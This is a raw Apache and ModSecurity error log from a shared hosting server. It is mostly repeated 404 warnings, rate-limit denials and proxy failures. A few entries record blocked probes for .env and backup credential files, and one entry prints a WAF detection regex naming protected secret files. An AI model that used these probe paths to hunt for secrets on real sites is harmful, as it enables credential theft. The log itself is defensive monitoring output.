[Tue May 26 19:54:35.344138 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIWDRMqfxdEDkoszRegAAAB0"]
[Tue May 26 19:54:35.354817 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JfwAAAcA"]
[Tue May 26 19:54:35.358701 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JiQAAAao"]
[Tue May 26 19:54:35.365831 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JigAAAac"]
[Tue May 26 19:54:35.376565 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBEAAAAP8"]
[Tue May 26 19:54:35.377225 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JkAAAAgA"]
[Tue May 26 19:54:35.383838 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JhAAAAgM"]
[Tue May 26 19:54:35.384840 2026] [security2:error] [pid 86490:tid 86675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBGgAAALw"]
[Tue May 26 19:54:35.385794 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JgQAAAgE"]
[Tue May 26 19:54:35.394955 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBDAAAALY"]
[Tue May 26 19:54:35.403327 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBEQAAAJk"]
[Tue May 26 19:54:35.411017 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtImDRMqfxdEDkoszRjQAAAGA"]
[Tue May 26 19:54:35.411482 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtImDRMqfxdEDkoszRlAAAAHQ"]
[Tue May 26 19:54:35.420440 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBGAAAAOw"]
[Tue May 26 19:54:35.427556 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JmgAAAas"]
[Tue May 26 19:54:35.434845 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBHAAAALg"]
[Tue May 26 19:54:35.444537 2026] [security2:error] [pid 86490:tid 86681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBGwAAAMI"]
[Tue May 26 19:54:35.445799 2026] [security2:error] [pid 86490:tid 86722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBDwAAAOs"]
[Tue May 26 19:54:35.447366 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JmwAAAf4"]
[Tue May 26 19:54:35.458763 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtImDRMqfxdEDkoszRiAAAAEE"]
[Tue May 26 19:54:35.462330 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JkwAAAb0"]
[Tue May 26 19:54:35.486591 2026] [core:crit] [pid 93868:tid 94333] (13)Permission denied: [client 40.77.167.35:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:54:35.662382 2026] [proxy:error] [pid 93576:tid 93754] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:35.662449 2026] [proxy_http:error] [pid 93576:tid 93754] [client 142.248.80.176:25262] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:35.663065 2026] [proxy:error] [pid 93576:tid 93754] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:35.663103 2026] [proxy_http:error] [pid 93576:tid 93754] [client 142.248.80.176:25262] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:35.823617 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI2DRMqfxdEDkoszRxwAAAGc
[Tue May 26 19:54:35.848484 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI0qK9k_ZUB2Vp25J7gAAAgk
[Tue May 26 19:54:35.849185 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI2DRMqfxdEDkoszRyQAAAEs
[Tue May 26 19:54:35.849784 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI0qK9k_ZUB2Vp25J7wAAAdw
[Tue May 26 19:54:35.850762 2026] [qos:error] [pid 93868:tid 94370] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI0qK9k_ZUB2Vp25J8AAAAf8
[Tue May 26 19:54:35.850943 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI2DRMqfxdEDkoszRygAAAHY
[Tue May 26 19:54:35.868090 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI2DRMqfxdEDkoszRywAAAEw
[Tue May 26 19:54:35.868337 2026] [qos:error] [pid 93868:tid 94343] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI0qK9k_ZUB2Vp25J8gAAAeQ
[Tue May 26 19:54:35.868740 2026] [qos:error] [pid 93868:tid 94382] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI0qK9k_ZUB2Vp25J8wAAAgs
[Tue May 26 19:54:35.869094 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI0qK9k_ZUB2Vp25J9AAAAgE
[Tue May 26 19:54:35.880409 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI2DRMqfxdEDkoszRzgAAAD8
[Tue May 26 19:54:35.880434 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtI2DRMqfxdEDkoszRzQAAADM
[Tue May 26 19:54:35.882310 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtI1ZMwN0DpLVWo6LBdgAAAJM
[Tue May 26 19:54:35.911371 2026] [security2:error] [pid 93868:tid 94264] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25JwgAAAZU"]
[Tue May 26 19:54:36.041134 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/web/.env"] [unique_id "ahWtJFZMwN0DpLVWo6LBewAAALw"]
[Tue May 26 19:54:36.265354 2026] [security2:error] [pid 93868:tid 94298] [client 142.248.80.176:25268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.preetishah.com"] [uri "/___proxy_subdomain_cpcontacts/.env.production.copy"] [unique_id "ahWtJEqK9k_ZUB2Vp25J-AAAAbc"]
[Tue May 26 19:54:36.266936 2026] [proxy:error] [pid 93576:tid 93739] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.267004 2026] [proxy_http:error] [pid 93576:tid 93739] [client 142.248.80.176:25222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.267601 2026] [proxy:error] [pid 93576:tid 93739] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.267663 2026] [proxy_http:error] [pid 93576:tid 93739] [client 142.248.80.176:25222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.268039 2026] [proxy:error] [pid 93868:tid 94342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.268107 2026] [proxy_http:error] [pid 93868:tid 94342] [client 142.248.80.176:25256] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.268720 2026] [proxy:error] [pid 93868:tid 94342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:36.268756 2026] [proxy_http:error] [pid 93868:tid 94342] [client 142.248.80.176:25256] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:36.280215 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBLAAAAJU"]
[Tue May 26 19:54:36.280474 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JpgAAAZM"]
[Tue May 26 19:54:36.283047 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JpQAAAds"]
[Tue May 26 19:54:36.285002 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtImDRMqfxdEDkoszRlwAAAEU"]
[Tue May 26 19:54:36.295046 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JnwAAAeo"]
[Tue May 26 19:54:36.301692 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JoAAAAgY"]
[Tue May 26 19:54:36.303687 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBHgAAANI"]
[Tue May 26 19:54:36.309961 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JoQAAAb4"]
[Tue May 26 19:54:36.313080 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JnAAAAaI"]
[Tue May 26 19:54:36.322194 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JpAAAAdM"]
[Tue May 26 19:54:36.325891 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBMQAAALI"]
[Tue May 26 19:54:36.344830 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JqgAAAc0"]
[Tue May 26 19:54:36.345127 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBMgAAANg"]
[Tue May 26 19:54:36.347461 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JrAAAAaY"]
[Tue May 26 19:54:36.350787 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIkqK9k_ZUB2Vp25JqwAAAcs"]
[Tue May 26 19:54:36.352203 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25JyAAAAeI"]
[Tue May 26 19:54:36.353094 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J0wAAAbQ"]
[Tue May 26 19:54:36.356808 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRpgAAAAQ"]
[Tue May 26 19:54:36.366616 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRngAAADk"]
[Tue May 26 19:54:36.374797 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRpAAAAEo"]
[Tue May 26 19:54:36.384618 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25JyQAAAd8"]
[Tue May 26 19:54:36.393856 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25JygAAAeA"]
[Tue May 26 19:54:36.409058 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J3gAAAek"]
[Tue May 26 19:54:36.414478 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRqQAAAHw"]
[Tue May 26 19:54:36.416978 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J2QAAAeg"]
[Tue May 26 19:54:36.430278 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J3AAAAg4"]
[Tue May 26 19:54:36.431645 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRqAAAACI"]
[Tue May 26 19:54:36.440192 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRpQAAAFo"]
[Tue May 26 19:54:36.446308 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRuwAAABA"]
[Tue May 26 19:54:36.447027 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRrAAAAAA"]
[Tue May 26 19:54:36.451586 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J5QAAAa0"]
[Tue May 26 19:54:36.452822 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J4gAAAdg"]
[Tue May 26 19:54:36.599044 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJFZMwN0DpLVWo6LBxwAAAPk
